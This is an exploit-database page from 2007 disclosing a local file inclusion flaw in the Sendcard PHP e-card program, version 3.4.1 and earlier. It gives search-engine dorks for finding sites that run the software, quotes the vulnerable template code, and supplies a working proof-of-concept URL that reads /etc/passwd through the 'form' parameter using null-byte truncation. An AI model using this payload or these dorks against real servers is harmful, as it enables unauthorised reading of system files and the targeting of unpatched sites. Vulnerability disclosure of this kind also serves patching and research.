Sendcard <= 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Sendcard <= 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability
# Published : 2007-05-01
# Author : ettee
# Previous Title : Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability
# Next Title : Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability

Sendcard  (sendcard.php) Sendcard Local File Inclusion Vulnerability

Discovered: ettee
Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org
         "powered by Sendcard"

Bug:
"// Get the template details
if(!isset($form) || $form == ''){
    $form = "form";
}
if(!isset($des) || $des == ''){
    $des = "card";
}
if (!isset($template) || $template == '') {
    $template = 'message';
}"

PoC:
http://[site]/[path]/sendcard.php?form=/etc/passwd%00

# www.Syue.com [2007-05-01]